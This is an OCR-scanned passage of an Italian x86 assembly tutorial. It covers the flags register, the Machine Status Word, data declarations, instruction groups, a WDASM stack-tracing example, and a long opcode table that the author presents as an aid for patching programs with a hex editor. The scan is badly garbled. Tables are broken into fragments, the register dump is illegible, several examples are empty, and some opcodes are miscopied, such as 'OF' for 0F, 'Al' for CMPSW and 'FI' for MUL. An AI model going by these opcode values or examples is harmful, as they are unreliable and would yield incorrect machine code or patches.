Prima di proseguire con le istruzioni assemblative diamo un occhiata a quella che permette di 
dichiarare delle variabili. 

FLAGS - Intel 8086 Family Flags Register 

\11\10\F\E\D\C\B\A\9\8\7\6\5\4\3\2\1\0\ 

I I I I I I I I I I I I I I I I I ' CF Carry Flag 

I I I I I I I I I I I I I I I I ' 1 

I I I I I I I I I I I I I I I ' PF Parity Flag 

I I I I I I I I I I I I I I ' — 0 

I I I I I I I I I I I I I ' AF Auxiliary Flag 

I I I I I I I I I I I I ' — 0 

I I I I I I I I I I I ' ZF Zero Flag 

I I I I I I I I I I ' SF Sign Flag 

I I I I I I I I I ' TF Trap Flag (Single Step) 

I I I I I I I I ' IF Interrupt Flag 

I I I I I I I ' DF Direction Flag 

I I I I I I ' OF Overflow flag 

I III ' IOPL I/O Privilege Level (286+ only) 

I I I ' NT Nested Task Flag (286+ only) 

I i r Q 

I ' RF Resumé Flag (386+ only) 

' VM Virtual Mode Flag (386+ only) 

- see PUSHF POPF STI CLI STD CLD 



Una specie di registro particolare è il seguente, presente solo nelle macchine successive al 
286. 
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MSW - Machine Status Word (286+ only) 

\31\30-5\4\3\2\1\0\ Machine Status Word 

I I I I ' Protection Enable (PE) 

I I I ' Math Present (MP) 

I I ' Emulation (EM) 

I ' Task Switched (TS) 

' Extension Type (ET) 

Reserved 

' Paging (PG) 

Bit 0 PE Protection Enable, switches processor between 

protected and real mode 
Bit 1 MP Math Present, controls function of the WAIT 

instruction 

Bit 2 EM Emulation, indicates whether coprocessor functions 

are to be emulated 
TS Task Switched, set and interrogated by 



Bit 3 
coprocessor 

coprocessor 

Bit 4 

in 



on 



task switches and when interpretting 



ET 



Bits 5-30 
bit 31 PG 



instructions 

Extension Type, indicates type of coprocessor 

system 
Reserved 

Paging, indicates whether the processor uses 



page 
physical 



tables to 
addresses 



translate linear addresses to 



- see 



SMSW LMSW 



Abbiamo accennato prima qualche cosa a riguardo delle allocazioni delle variabili nei vari 
segmenti. 

In linguaggi come il Basic la tipologia delle variabili riguarda in particolare modo il genere dei 
contenuti. 

In altre parole le informazioni di tipo quantitativo possono essere inserite in variabili di tipo 
numerico mentre le informazioni di tipo qualitativo in variabili stringa. 

In linguaggio C invece la tipologia delle variabili riguardano in particolare modo le dimensioni 
relative all'occupazione del dato stesso espresso in numero di bytes. 

Ad esempio un carattere che occupa un solo byte può essere contenuto tranquillamente in un 

char anche se nessuno ci vieta di inserirlo in un int o short. 

Oltre a questo nessuno ci vieta di usare la variabile per calcoli matematici. 

Ad esempio fare : 



char c = 'A' 
c * 2; 



è corretto. 

Al limite dobbiamo stare attenti a non mandare in overflow la variabile con il risultato 
dell'operazione. 

Il problema si pone spesso quando si usano variabili per fare calcoli. 

Se ad esempio usassimo una serie di variabili per fare calcoli dobbiamo preoccuparci che le 
variabili siano sufficientemente grosse a mantenere i vari valori che durante i calcoli si 
creano. 

In pratica se avessimo : 



int n = 30000; 
int x = 20; 
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saremmo, fino a questo punto, a posto. 
Andremmo male facendo : 



in quanto (n * r) darebbe un valore maggiore alle tipologie int usate nei tipi dell'operazione per 

cui i valori sarebbero troncati. 

Questa è causa sovente di errori inspiegabili. 

In assembler le variabili sono di tipo BYTE, WORD, DOUBLEWORD e sono quasi sempre 
dichiarate nel data segment mediante la sintassi seguente: 



Ad esempio : 



DATA_PTR 


DW 


? 


ESC_CHAR 


DB 


? 



Le tipologie sono : 



(nome 


var 


opzionale) 


DB 


(lista valori) 


(nome 


var 


opzionale) 


DW 


(lista valori) 


(nome 


var 


opzionale) 


DD 


(lista valori) 


(nome 


var 


opzionale) 


DQ 


(lista valori) 


(nome 


var 


opzionale) 


DT 


(lista valori) 



ovvero 



BYTE 


-> 


DB 




WORD 


-> 


DW 




DWORD 


-> 


DD 




QWORD 


-> 


DQ 




TWORD 


-> 


DT 





Nelle dichiarazioni possono essere utilizzati termini particolari come ad esempio DUP. 
Le seguenti sono allocazioni valide. 



DW 


5 






alloca una word, inizializzandola con 5 


DB 


o, 


3,0 




alloca tre bytes, inizializzandoli con 0, 3, 0 


DB 


5 


DUP 


(0) 


; equivalente a DB 0, 0, 0, 0, 0 


DW 


2 


DUP 


(0,4 


DUP (7)) ; equivalente a DW 0, 7, 7, 7, 7, 0, 7, 7, 7, 7 



Per le stringhe è possibile : 



Vediamo in dettaglio il set istruzioni assembler. 
Istruzioni ordinarie a due operandi 

1 ) ADD e ADC - Addizione con o senza includere un riporto dalla precedente addizione. 

2) SUB o SBB - Sottrazione con o senza riporto da una precedente sottrazione. 

3) CMP - Comparazione 

4) AND, OR o XOR - Tipiche operazioni booleane 

5) TEST -Tipo AND 

6) MOV - Muove i dati dalla sorgente alla destinazione 

7) LDS, LES, LEA - Forme di MOV specializzate 
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Molte forme di caricamento delle stringhe relative a messaggi da visualizzare vengono 
eseguite tramite queste ul6time istruzioni. 
Sono comuni costrutti del tipo : 

lea edx, dword ptr [ebp + FFFFAA8] 



Istruzioni ordinarie ad un solo operando sono : 



1) 


INC- 


incrementa il contenuto 


2) 


DEC- 


- Decrementa 


3) 


NEG- 


- Due complementi 


4) 


NOT- 


- Un complemento 


5) 


PUSH 


- Inserisce un valore nello stack 



Alcune istruzioni non seguono le regole generali delle altre ma comunque richiedono l'uso di 
erti registri. 

1) Istruzioni di moltiplicazione e divisione. 

2) Istruzioni di aggiustamento che aiutano a eseguire operazioni su dati ASCII 

3) Operazioni di shift e di rotazione 

4) IN, OUT le quali agiscono sulle 1 024 possibili porte hardware 

5) CBW , CWD - Convertono byte in word oppure word in doubleword. 

Istruzioni che agiscono sul flusso del programma. 

1) CALL, RET - Chiamata e ritorno. Ricordatevi del discorso fatto per il basic legato alle 
istruzioni di salto condizionate (GOSUB e RETURN). 

2) INT, IRET - Chiamata d' interrupts e ritorno da una routine d'interript. 

3) JMP- Salto 

4) LOOP, LOOPNZ, LOOPZ - Istruzioni che implementano dei loops. 

5) Varie istruzioni di salto condizionate (JE, JNE ecc.) 



Istruzioni su stringhe o sequenze di caratteri. 

Considerate in queste istruzioni che spesso i sorgenti sono descritte da combinazioni di DS e 
SI, mentre le destinazioni da ES e DI. 

1 ) CMPSB/CMPSW - Compara byte o word 

2) LODSB/LODSW - Legge bytes o words in AL o AX 

3) STOSB/STOSW - Salva bytes o words da AL o AX. 

4) MOVSB/MOVSW - Muove bytes o words 

5) SCASB/SCASW - Compara bytes o words con i contenuti di AL o AX. 

6) REP/REPE/REPNE - Un prefisso con il quale può essere combinato con qualsiasi 
delle precedenti istruzioni perche vengano ripetute su una stringa la cui lunghezza è 

Ad esempio : 

REP MOVSB 
REP STOSB 



Altre istruzioni riguardano lo stack. 

Le funzionalit sono due : 



1) 



PUSH - Inserisce un valore nello stack 
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Quando seguite un programma tenetelo sempre a bada in particolar modo prima e dopo 
qualche chiamata. 

A proposito di chiamate, queste avvengono tramite l'istruzione : 



1) CALL - Esegue una chiamata 



Se usate WDASM potete richiedere la visualizzazione di ESP nel seguente modo. 
Prendiamo un piccolo esempio per capire di cosa stiamo parlando. 

Supponiamo di avere il seguente codice e di essere posizionati sulla linea precedente aqlla 
cali. 



-.0040C191 


A3309D4100 


mov dword ptr 


[00419D30], eax 


-.0040C196 


E895230000 


cali 0040E530 




:0040C19B 


A300744100 


mov dword ptr 


[00417400], eax 



Se in WDASM analizziamo la finestra con i registri possiamo richiedere di visualizzare nella 
finestrella centrale il registro ESP. 
Il seguente è la copia prima della cali. 





$r tato H±-T> 1 



Itif-DOOODOH] 
[Bip-DuuaDulQ] 
[Eir-DOOODOOC | 

[B£f-DÙùaDÙÙ3] 

I Eip-OOOOOOCH | 



[flgp4DÙQQDQÙ0] - DùùaDÙOa 



I EU? + 0000 0004 | 
[iip4D0QaDQua] 

| tip + 0000 000C| 
[iip+ dodi: Dola] 
[eip + DOOODOJH] 



| Uy. U 1 1 1 Hafla-s |morfl Word | Byte 



[esp-00000014] ■ 


- 0000017 f 




[esp-00000010] ■ 


- 00000000 




[esp-OOOOOOOC] ■ 


- 00000216 




[esp-00000008] ■ 


- 00000316 




[esp-00000004] ■ 


- 0040cl91 


..e- 


[esp+OOOOOOOO] ■ 


- 00000000 




[esp+00000004] ■ 


- 815dll7c 


i.]. 


[esp+00000008] ■ 


- 00550000 


. .u. 


[esp+OOOOOOOC] ■ 


- 00000000 




[esp+00000010] ■ 


- 00000008 





Ricordatevi che il pulsanti in basso permettono di vedere come dword, word, byte o codice i 
dati di questa finestra. 

A questo punto richiediamo di eseguire la cali e successivamente analizziamo i dati mostrati. 



[esp-00000014] 


- 0000017 f 






[esp-00000010] 


- 815dll7c 


1 


]■ 


[esp-OOOOOOOC] 


- 0065fe38 


8 


e. 


[esp-00000008] 


- 00550000 




u. 


[esp-00000004] 


- 0040cl9b 




@. 


[esp+OOOOOOOO] 


- 00000000 






[esp+00000004] 


- 815dll7c 


1 


]. 


[esp+00000008] 


- 00550000 




u. 


[esp+OOOOOOOC] 


- 00000000 






[esp+OOOOOOlO] 


- 00000008 







Se vi dovesse servire apritevi il NOTEPAD e di tanto in tanto usate i pulsanti COPY 
posizionati su ogni finestrella. 
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Successivamente potete usare il comando PASTE per metterveli nel notepad. 

A forza di seguire programmi assembler tenersi segnato da qualche parte i dati può essere 

utile. 

Esistono anche dei flags che indicano alcuni avvenimenti particolari quali interrupts, riporti 
ecc. 

La seguente tabella mostra le istruzioni riservate dell'assembler compresi gli opcode. 

Questi sono importanti in quanto è necessari conoscerli per poterli sostituire con un editor hex 

nelle patch ai nostri programmi. 

Gli indirizzi effettivi li potete calcolare riferendovi alla tabella riportata precedentemente in 
questo capitolo. 



"v" denota un tipo uguale a 


w ovvero una word (16 bits) . 


"c" indica che l'operando 


è una code-label, la quale punta ad una parte del 


programma che deve essere "salato" o "chiamato" . 


"e" indica che l'operando è 


un indirizzo effettivo . 


"i" indica una costante immediata. 


"m" indica una variabile in 


memoria . 


"r" indica un registro ad uso generale. 


"rv/m" è usato in istruzioni bit test 


Opcodes 


Instruction 


Description 


67 or nil 


A2 (prefix ) 


3 Use 


16— bit address (indexing) in next instruction 


67 or nil 


A4 (prefix) 


3 Use 


32— bit address (indexing) in next instruction 


37 


AAA 


ASCII adjust AL (carry into AH) after addition 


D5 OA 


AAD 


ASCII adjust before division (AX = 10*AH + AL) 


D4 OA 


AAM 


ASCII adjust after multiply (AL/10: AH=Quo AL=Rem) 


3F 


AAS 


ASCII adjust AL (borrow from AH) after subtraction 


14 ib 


ADC AL, ib 


Add 


with carry immediate byte into AL 


15 iv 


ADC eAX,iv 


Add 


with carry immediate vword into eAX 


80 /2 ib 


ADC eb, ib 


Add 


with carry immediate byte into EA byte 


10 /r 


ADC eb, rb 


Add 


with carry byte register into EA byte 


83 /2 ib 


ADC ev, ib 


Add 


with carry immediate byte into EA vword 


81 /2 iv 


ADC ev, iv 


Add 


with carry immediate vword into EA vword 


11 /r 


ADC ev, rv 


Add 


with carry vword register into EA vword 


12 /r 


ADC rb, eb 


Add 


with carry EA byte into byte register 


13 /r 


ADC rv, ev 


Add 


with carry EA vword into vword register 


04 ib 


ADD AL, ib 


Add 


immediate byte into AL 


05 iv 


ADD eAX,iv 


Add 


immediate vword into eAX 


80 /0 ib 


ADD eb, ib 


Add 


immediate byte into EA byte 


00 /r 


ADD eb, rb 


Add 


byte register into EA byte 


83 /0 ib 


ADD ev, ib 


Add 


immediate byte into EA vword 


81 /0 iv 


ADD ev, iv 


Add 


immediate vword into EA vword 


01 /r 


ADD ev, rv 


Add 


vword register into EA vword 


02 /r 


ADD rb, eb 


Add 


EA byte into byte register 


03 /r 


ADD rv, ev 


Add 


EA vword into vword register 


OF 20 


ADD4S 


N Add 


CL nibbles BCD, DS:SI into ES-.DI (CL even,NZ) 


24 ib 


AND AL, ib 


Logicai— AND immediate byte into AL 


25 iv 


AND eAX, iv 


Logicai— AND immediate vword into eAX 


80 /4 ib 


AND eb, ib 


Logicai— AND immediate byte into EA byte 


20 /r 


AND eb,rb 


Logicai— AND byte register into EA byte 


83 /4 ib 


AND ev, ib 


Logicai— AND immediate byte into EA vword 


81 /4 iv 


AND ev, iv 


Logicai— AND immediate vword into EA vword 


21 /r 


AND ev, rv 


Logicai— AND vword register into EA vword 


22 /r 


AND rb,eb 


Logicai— AND EA byte into byte register 


23 /r 


AND rv, ev 


Logicai— AND EA vword into vword register 


63 /r 


ARPL ew, rw 


2 Adjust RPL of EA word not smaller than RPL of rw 


62 /r 


BOUND rv,m2v 


2 INT 


5 if rw not between 2 vwords at [m] inclusive 


OF BC 


BSF rv, ev 


3 Set 


rv to lowest position of NZ bit in ev 


OF BD 


BSR rv, ev 


3 Set 


rv to highest position of NZ bit in ev 


OF C8+r 


BSWAP rd 


4 Swap bytes 1,4 and 2,3 of dword register 


OF BA/4 ib BT rv/m, ib 


3 Set 


Carry flag to bit # ib of array at rv/m 


OF A3/r 


BT rv/m, rv 


3 Set 


Carry flag to bit # rv of array at rv/m 


OF BA/7 ib 


BTC rv/m, ib 


3 Set 


CF to, then compi bit ib of array at rv/m 


OF BB/r 


BTC rv/m, rv 


3 Set 


CF to, then compi bit rv of array at rv/m 


OF BA/6 ib BTR rv/m, 


3 Set 


CF to, then reset bit ib of array at rv/m 


OF B3/r 


BTR rv/m, rv 


3 Set 


CF to, then reset bit rv of array at rv/m 


OF BA/5 ib BTS rv/m, ib 


3 Set 


CF to, then set bit ib of array at rv/m 
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9A cp 


CALL cp 




Cali far segment, immediate 4- or 6-byte address 


E8 cv 


CALL cv 




Cali near, offset relative to next instruction 


FF /3 


CALL ep 




Cali far segment, address at EA memory location 


FF /2 


CALL ev 




Cali near, offset absolute at EA vword 


OF FF ib 


CALL80 ib 


N 


Cali 8080-emulation code at INT number ib 


98 


CBW 




Convert byte into word (AH = top bit of AL) 


99 


CDQ 


3 


Convert dword to qword (EDX = top bit of EAX) 


F8 


CLC 




Clear carry flag 


FC 


CLD 




Clear direction flag so SI and DI will increment 


FA 


CLI 




Clear interrupt enable flag; interrupts disabled 


OF 12/0 


CLRBIT eb,CL 


N 


Clear bit CL of eb 


OF 13/0 


CLRBIT ew,CL 


N 


Clear bit CL of ew 


OF 1A/0 ib 


CLRBIT eb,ib 


N 


Clear bit ib of eb 


OF 1B/0 ib 


CLRBIT ew,ib 


N 


Clear bit ib of ew 


OF 06 


CLTS 


2 


Clear task switched flag 


F5 


CMC 




Complement carry flag 


3C ib 


CMP AL, ib 




Subtract immediate byte from AL for flags only 


3D iv 


CMP eAX, iv 




Subtract immediate vword from eAX for flags only 


80 /7 ib 


CMP eb, ib 




Subtract immediate byte from EA byte for flags only 


38 /r 


CMP eb, rb 




Subtract byte register from EA byte for flags only 


83 /7 ib 


CMP ev, ib 




Subtract immediate byte from EA vword for flags only 


81 /7 iv 


CMP ev, iv 




Subtract immediate vword from EA vword, flags only 


39 /r 


CMP ev, rv 




Subtract vword register from EA vword for flags only 


3A /r 


CMP rb, eb 




Subtract EA byte from byte register for flags only 


3B /r 


CMP rv, ev 




Subtract EA vword from vword register for flags only 


OF 26 


CMP4S 


N 


Compare CL nibbles BCD, DS:SI - ES-.DI (CL even,NZ) 


A6 


CMPS mb,mb 




Compare bytes [SI] - ES:[DI], advance SI, DI 


A7 


CMPS mv,mv 




Compare vwords [SI] - ES:[DI], advance SI, DI 


A6 


CMPSB 




Compare bytes DS:[SI] - ES:[DI], advance SI, DI 


A7 


CMPSD 




Compare dwords DS: [SI] - ES:[DI], advance SI, DI 


Al 


CMPSW 




Compare words DS:[SI] - ES:[DI], advance SI, DI 


OF C7 /l 


CMPX8 mq 


5 


If EDXEAX=mq then mq:=ECXEBX, else EAXEDX : =mq 


OF BO /r 


CMPXCHG eb,rb 


4 


If AL=eb then set eb to rb, else set AL to eb 


OF Bl /r 


CMPXCHG ev,rv 


4 


If eAX=ev then set ev to rv, else set eAX to ev 


OF A2 


CPUID 


5 


If EAX=1 set EDXEAX to CPU Identification values 


99 


CWD 




Convert word to doubleword (DX = top bit of AX) 


98 


CWDE 


3 


Sign—extend word AX to doubleword EAX 


2E 


CS (prefix) 




Use CS segment for the following memory reference 


27 


DAA 




Decimai adjust AL after addition 


2F 


DAS 




Decimai adjust AL after subtraction 


FE /l 


DEC eb 




Decrement EA byte by 1 


FF /l 


DEC ev 




Decrement EA vword by 1 


48+rv 


DEC rv 




Decrement vword register by 1 


F6 /6 


DIV eb 




Unsigned divide AX by EA byte (AL=Quo AH=Rem) 


F7 /6 


DIV ev 




Unsigned divide eDXeAX by EA vword (eAX=Quo eDX=Rem) 


3E 


DS (prefix ) 




Use DS segment for the following memory reference 


C8 iw 00 


ENTER iw, 0 


1 


Make stack frame, iw bytes locai Storage, 0 levels 


C8 iw 01 


ENTER iw,l 


1 


Make stack frame, iw bytes locai Storage, 1 level 


C8 iw ib 


ENTER iw, ib 


1 


Make stack frame, iw bytes locai Storage, ib levels 


26 


ES (prefix) 




Use ES segment for the following memory reference 




F (any) 




Floating point set is in Chapter 7 


F4 


HLT 




Halt 


F6 /7 


IDIV eb 




Signed divide AX by EA byte (AL=Quo AH=Rem) 


F7 /7 


IDIV ev 




Signed divide eDXeAX by EA vword (eAX=Quo eDX=Rem) 


F6 /5 


IMUL eb 




Signed multiply (AX = AL * EA byte) 


F7 /5 


IMUL ev 




Signed multiply (eDXeAX = eAX * EA vword) 


OF AF /r 


IMUL rv, ev 


3 


Signed multiply ev into rv 


6B /r ib 


IMUL rv,ib 


1 


Signed multiply imm byte into vword register 


69 /r iv 


IMUL rv, iv 


1 


Signed multiply imm vword into vword register 


69 /r iv 


IMUL rv, ev, iv 


1 


Signed multiply (rv = EA vword * imm vword) 


6B /r ib 


IMUL rv, ev, ib 


1 


Signed multiply (rv = EA vword * imm byte) 


E4 ib 


IN AL, ib 




Input byte from immediate port into AL 


EC 


IN AL, DX 




Input byte from port DX into AL 


E5 ib 


IN eAX, ib 




Input vword from immediate port into eAX 


ED 


IN eAX,DX 




Input vword from port DX into eAX 
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FE 


/O 




INC eb 




Increment EA byte by 1 


FF 


/O 




INC ev 




Increment EA vword by 1 


40+rv 




INC rv 




Increment 


vword register by 1 


6C 






INS eb,DX 


1 


Input byte 


from port DX into [DI], advance DI 


6D 






INS ev,DX 


1 


Input vword front port DX into [DI], advance DI 


6C 






INSB 


1 


Input byte 


from port DX into ES:[DI], advance DI 


6D 






INSD 


3 


Input dword front port DX into ES : [DI] , advance DI 


6D 






INSW 


1 


Input vword front port DX into ES : [DI] , advance DI 


ce 






INT 3 




Interrupt 3 (trap to debugger) (far cali, with flags 


CD 


ib 




INT ib 




Interrupt numbered by immediate byte pushed first) 


CE 






INTO 




Interrupt 


4 if overflow flag is 1 


OF 


08 




INVD 


4 


Invalidate 


the Data Cache without writing 


OF 


01 


n 


INVLPG m 


4 


Invalidate 


the TLB Entry that points to m 


CF 






IRET 




Interrupt . 


return (far return and pop flags) 


CF 






IRETD 


3 


Interrupt . 


return (pop EIP, ECS, Eflags) 


77 


ab 




JA cb 




Jump 


short 


if 


above (CF=0 and ZF=0) above=UNSIGNED 


73 


db 




JAE cb 




Jump 


short 


if 


above or equal (CF=0) 


72 


db 




JB cb 




Jump 


short 


if 


below (CF=1) below=UNSIGNED 


76 


cb 




JBE cb 




Jump 


short 


if 


below or equal (CF=1 or ZF=1) 


72 


cb 




JC cb 




Jump 


short 


if 


carry (CF=1) 


E3 


cb 




JCXZ cb 




Jump 


short 


if 


CX register is zero 


74 


cb 




JE cb 




Jump 


short 


if 


equal (ZF=1) 


E3 


cb 




JECXZ cb 


3 


Jump 


short 


if 


ECX register is zero 


7F 


cb 




JG cb 




Jump 


short 


if 


greater (ZF=0 and SF=OF) greater=SIGNED 


7D 


cb 




JGE cb 




Jump 


short 


if 


greater or equal (SF=OF) 


7C 


cb 




JL cb 




Jump 


short 


if 


less (SF>OF) less=SIGNED 


7E 


cb 




JLE cb 




Jump 


short 


if 


less or equal (ZF=1 or SF>OF) 


EB 


cb 




JMP cb 




Jump 


short 


(signed byte relative to next instruction) 


EA 


cp 




JMP cp 




Jump 


far (4- or 6-byte immediate address) 


E9 


cv 




JMP cv 




Jump 


near 


(vword offset relative to next instructiai) 


OF 


8n 


cv 


Jcond LONG 


cv 3 


Jump, 


if condition, to offset >127 away 


FF 


/4 




JMP ev 




Jump 


near 


to EA vword (absolute offset) 


FF 


/5 




JMP md 




Jump 


far (4— byte address in memory doubleword) 


76 


cb 




JNA cb 




Jump 


short 


if 


not above (CF=1 or ZF=1) 


72 


cb 




JNAE cb 




Jump 


short 


if 


not above or equal (CF=1) 


73 


cb 




JNB cb 




Jump 


short 


if 


not below (CF=0) 


77 


cb 




JNBE cb 




Jump 


short 


if 


not below or equal (CF=0 and ZF=0) 


73 


cb 




JNC cb 




Jump 


short 


if 


not carry (CF=0) 


75 


cb 




JNE cb 




Jump 


short 


if 


not equal (ZF=0) 


7E 


cb 




JNG cb 




Jump 


short 


if 


not greater (ZF=1 or SF>OF) 


7C 


cb 




JNGE cb 




Jump 


short 


if 


not greater or equal (SF>OF) 


7D 


cb 




JNL cb 




Jump 


short 


if 


not less (SF=OF) 


7F 


cb 




JNLE cb 




Jump 


short 


if 


not less or equal (ZF=0 and SF=OF) 


71 


cb 




JNO cb 




Jump 


short 


if 


not overflow (OF=0) 


7B 


cb 




JNP cb 




Jump 


short 


if 


not parity (PF=0) 


79 


cb 




JNS cb 




Jump 


short 


if 


not sign (SF=0) 


75 


cb 




JNZ cb 




Jump 


short 


if 


not zero (ZF=0) 


70 


cb 




JO cb 




Jump 


short 


if 


overflow (0F=1 ) 


7A 


cb 




JP cb 




Jump 


short 


if 


parity (PF=1) 


7A 


cb 




JPE cb 




Jump 


short 


if 


parity even (PF=1) 


7B 


cb 




JPO cb 




Jump 


short 


if 


parity odd (PF=0) 


78 


cb 




JS cb 




Jump 


short 


if 


sign (SF=1) 


74 


cb 




JZ cb 




Jump 


short 


if 


zero (ZF=1) 


9F 






LAHF 




Load: 


■ AH = 


flags SF ZF xx AF xx PF xx CF 


OF 


02 


/r 


LAR rv, ew 


2 


Load: 


high (rw) 


= Access Rights byte, selector ew 


C5 


/r 




LDS rv, ep 




Load 


EA pointer into DS and vword register 


8D 


/r 




LEA rv, m 




Calculate EA offset given by m, place in rv 


C9 






LEAVE 


1 


Set SP to BP, 


then POP BP (reverses previous ENTER) 


C4 


/r 




LES rv, ep 




Load EA pointer into ES and vword register 


OF 


B4 


/r 


LFS rv, ep 


3 


Load EA pointer into FS and vword register 


OF 


01 


/2 


LGDT m 


2 


Load 


6 bytes at m into Global Descriptor Table reg 


OF 


B5 


/r 


LGS rv, ep 


3 


Load EA pointer into GS and vword register 


OF 


01 


/3 


LIDT m 


2 


Load 


6 bytes into Interrupt Descriptor Table reg 


OF 


00 


/2 


LLDT ew 


2 


Load 


selector 


ew into Locai Descriptor Table reg 


OF 


01 


/6 


LMSW ew 


2 


Load 


EA word into Machine Status Word 
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OF 33/r 


LODBITS rb,rb 


N 


Load AX with DS:SI,bit rb (incr. SI,rb), rb+1 


bits 


OF 3B/0 ib 


LODBITS rb,ib 


N 


Load AX with DS:SI,bit rb (incr. SI, rb) , ib+1 


bits 


AC 


LODS mb 




Load byte [SI] into AL, advance SI 




AD 


LODS mv 




Load 


vword [SI] into eAX, advance SI 




AC 


LODSB 




Load byte [SI] into AL, advance SI 




AD 


LODSD 




Load 


dword [SI] into EAX, advance SI 




AD 


LODSW 




Load 


word [SI] into AX, advance SI 




E2 cb 


LOOP cb 




noflags DEC CX; jump short if CX>0 




El cb 


LOOPE cb 




noflags DEC CX; jump short if CX>0 and equal 


(ZF=1 ) 


EO cb 


LOOPNE cb 




noflags DEC CX; jump short if CX>0 and not equal 


EO cb 


LOOPNZ cb 




noflags DEC CX; jump short if CX>0 and ZF=0 




El cb 


LOOPZ cb 




noflags DEC CX; jump short if CX>0 and zero (ZF=1) 


OF 03 /r 


LSL 


rv, ev 


2 


Load. 


: rv = Segment Limit, selector ew 




OF B2 /r 


LSS 


rv,ep 


3 


Load 


EA pointer into SS and vword register 




OF 00 /3 


LTR 


ew 


2 


Load 


EA word into Task Register 




AO iv 


MOV 


AL, xb 




Move 


byte variable (offset iv) into AL 




Al iv 


MOV 


eAX, xv 




Move 


vword variable (offset iv) into eAX 




OF 22 /4 


MOV 


CR4, rd 


5 


Move 


rd into control register 4 




OF 22 /n 


MOV 


CRn, rd 


3 


Move 


rd into control register n (=0,2, or 3) 




OF 23 /n 


MOV 


DRn, rd 


3 


Move 


rd into debug register n (=0,1,2,3) 




OF 23 /n 


MOV 


DRn, rd 


3 


Move 


rd into debug register n (=6, 7) 




OF 26 /n 


MOV 


TRn, rd 


3 


Move 


rd into test register TRn (=6, 7) 




C6 /0 ib 


MOV 


eb, ib 




Move 


immediate byte into EA byte 




88 /r 


MOV 


eb, rb 




Move 


byte register into EA byte 




C7 /0 iv 


MOV 


ev, iv 




Move 


immediate vword into EA vword 




89 /r 


MOV 


ev, rv 




Move 


vword register into EA vword 




8C /r 


MOV 


ew, segreg 




Move 


segment register into EA word 




BO+rb ib 


MOV 


rb, ib 




Move 


immediate byte into byte register 




8A /r 


MOV 


rb, eb 




Move 


EA byte into byte register 




OF 20 /4 


MOV 


rd, CR4 


5 


Move 


control register 4 into rd 




OF 20 /n 


MOV 


rd, CRn 


3 


Move 


control register n (=0,2, or 3) into rd 




OF 21 /n 


MOV 


rd, DRn 


3 


Move 


debug register n (=0,1,2,3) into rd 




OF 21 /n 


MOV 


rd, DRn 


3 


Move 


debug register n (=6, 7) into rd 




OF 24 /n 


MOV 


rd, TRn 


3 


Move 


test register TRn (=6, 7) into rd 




B8+rw iv 


MOV 


rv, iv 




Move 


immediate vword into vword register 




8B /r 


MOV 


rv, ev 




Move 


EA vword into vword register 




8E /r 


MOV 


segreg, mw 




Move 


EA word into segment register (except CS) 


A2 iv 


MOV 


xb, AL 




Move 


AL into byte variable (offset iv) 




A3 iv 


MOV 


xv, eAX 




Move 


eAX into vword register (offset iv) 




A4 


MOVS mb,mb 




Move 


byte [SI] to ES:[DI], advance SI, DI 




A5 


MOVS mv,mv 




Move 


vword [SI] to ES:[DI], advance SI, DI 




A4 


MOVSB 




Move 


byte DS:[SI] to ES : [DI] , advance SI, DI 




A5 


MOVSD 


3 


Move 


dword DS:[SI] to ES:[DI], advance SI, DI 




A5 


MOVSW 




Move 


word DS:[SI] to ES : [DI] , advance SI, DI 




OF BF /r 


MOVSX rd,ew 


3 


Move 


word to dword, with sign—extend 




OF BE /r 


MOVSX rv,eb 


3 


Move 


byte to vword, with sign-extend 




OF B7 /r 


MOVZX rd,ew 


3 


Move 


word to dword, with zero-extend 




OF B6 /r 


MOVZX rv,eb 


3 


Move 


byte to vword, with zero-extend 




8C /r 


MOVZX rw,seg 


3 


Move 


segment register into EA word 




F6 /4 


MUL 


eb 




Unsigned multiply (AX = AL * EA byte) 




FI /4 


MUL 


ev 




Unsigned multiply (eDXeAX = eAX * EA vword) 




F6 /3 


NEG 


eb 




Two's complement negate EA byte 




F7 /3 


NEG 


ev 




Two's complement negate EA vword 






NIL 


(prefix) 




Special "do—nothing" opcode assembles no code 




90 


NOP 






No Operation 




F6 /2 


NOT 


eb 




Reverse each bit of EA byte 




F7 /2 


NOT 


ev 




Reverse each bit of EA word 




OF 16/0 


NOTBIT eb,CL 


N 


Complement bit CL of eb 




OF 17/0 


NOTBIT ew,CL 


N 


Complement bit CL of ew 




OF 1E/0 ib 


NOTBIT eb,ib 


N Complement bit ib of eb 




OF 1F/0 ib 


NOTBIT ew,ib 


N Complement bit ib of ew 




66 or nil 


02 , 


(prefix) 


3 


Use 16— bit data operand in the next instruction 


66 or nil 


04 


(vrefix) 


3 


Use 32-bit data ooerand in the next instruction 
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OD iv 




OR eAX,iv 




Logicai— OR immediate word into eAX 


80 /l 


ib 


OR eb, ib 




Logicai— OR immediate byte into EA byte 


08 /r 




OR eb, rb 




Logical-OR byte register into EA byte 


83 /l 


ib 


OR ev, ib 




Logicai— OR immediate byte into EA word 


81 /l 


iv 


OR ev, iv 




Logicai— OR immediate word into EA word 


09 /r 




OR ev, rv 




Logicai— OR word register into EA word 


OA /r 




OR rb, eb 




Logical-OR EA byte into byte register 


OB /r 




OR rv, ev 




Logicai— OR EA word into word register 


E6 ib 




OUT ib,AL 




Output byte AL to immediate port number ib 


E7 ib 




OUT ib, eAX 




Output word eAX to immediate port number ib 


EE 




OUT DX,AL 




Output byte AL to port number DX 


EF 




OUT DX,eAX 




Output word eAX to port number DX 


6E 




OUTS DX,eb 


1 


Output byte [SI] to port number DX, advance SI 


6F 




OUTS DX,ev 


1 


Output word [SI] to port number DX, advance SI 


6E 




OUTSB 


1 


Output byte DS: [SI] to port number DX, advance SI 


6F 




OUTSD 


3 


Output dword DS:[SI] to port number DX, advance SI 


6F 




OUTSW 


1 


Output word DS: [SI] to port number DX, advance SI 


1F 




POP DS 




Set DS to top of stack, increment SP by 2 


07 




POP ES 




Set ES to top of stack, increment SP by 2 


OF Al 




POP FS 


3 


Set FS to top of stack, increment SP by 2 


OF A9 




POP GS 


3 


Set GS to top of stack, increment SP by 2 


8F /0 




POP mv 




Set memory word to top of stack, increment SP by 2 


58+ rw 




POP rv 




Set word register to top of stack, increment SP by 2 


17 




POP SS 




Set SS to top of stack, increment SP by 2 


61 




POPA 


1 


Pop DI, SI, BP, SP, BX, DX, CX, AX (SP value is ignored) 


61 




POPAD 


3 Pop EDI,ESI,EBP,x,EBX,EDX,ECX,EAX (ESP ign . ) 


9D 




POPF 




Set flags register to top of stack, increment SP by 2 


9D 




POPFD 


3 


Set eflags reg to top of stack, incr SP by 2 


OE 




PUSH CS 




Set [SP-2] to CS, then decrement SP by 2 


1E 




PUSH DS 




